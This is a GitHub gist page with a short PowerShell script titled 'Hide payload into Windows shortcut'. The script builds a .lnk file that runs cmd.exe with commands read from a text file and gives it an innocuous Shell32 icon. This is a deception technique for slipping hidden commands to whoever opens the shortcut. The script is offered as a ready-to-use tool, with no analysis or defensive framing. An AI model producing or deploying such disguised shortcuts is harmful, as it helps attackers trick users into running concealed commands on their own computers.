Skip to content

Instantly share code, notes, and snippets.

@LucaBongiorni
Forked from 3gstudent/shortcut.ps1
Created January 16, 2017 08:17
Show Gist options
  • Save LucaBongiorni/f712456e5a131a07fd32ef6289b50ed1 to your computer and use it in GitHub Desktop.
Save LucaBongiorni/f712456e5a131a07fd32ef6289b50ed1 to your computer and use it in GitHub Desktop.
Hide payload into Windows shortcut
$file = Get-Content "c:\test\test.txt"
$WshShell = New-Object -comObject WScript.Shell
$Shortcut = $WshShell.CreateShortcut("c:\test\test.lnk")
$Shortcut.TargetPath = "%SystemRoot%\system32\cmd.exe"
$Shortcut.IconLocation = "%SystemRoot%\System32\Shell32.dll,21"
$Shortcut.Arguments = ' '+ $file
$Shortcut.Save()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment